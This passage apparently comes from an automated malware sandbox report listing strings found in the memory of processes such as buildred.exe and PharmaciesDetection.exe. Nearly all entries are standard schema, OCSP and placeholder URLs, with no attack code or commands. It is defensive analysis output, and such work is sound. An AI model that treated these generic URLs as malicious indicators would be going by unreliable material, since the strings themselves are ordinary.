Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times$
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000028.00000002.2917052824.00000261936E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919086701.0000026193AC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903918367.0000026192703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.00000261926FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2917052824.00000261936D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902396300.0000026192403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: PharmaciesDetection.exe, 00000015.00000000.2653080912.0000000000408000.00000002.00000001.01000000.00000010.sdmp, PharmaciesDetection.exe, 00000015.00000002.2680053271.0000000000408000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
